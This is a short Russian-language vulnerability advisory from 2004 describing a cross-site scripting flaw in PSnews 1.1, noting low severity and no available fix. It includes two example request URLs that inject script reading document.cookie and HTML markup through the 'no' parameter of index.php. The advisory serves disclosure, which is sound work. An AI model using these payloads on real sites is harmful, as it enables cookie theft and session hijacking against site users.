Межсайтовый скриптинг в PSnews

Дата публикации:
08.09.2004
Всего просмотров:
877
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PSnews 1.1

Описание: Уязвимость обнаружена в PSnews. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>

http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>

URL производителя: http://psnews.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Bug XSS in PsNews 1.1

или введите имя

CAPTCHA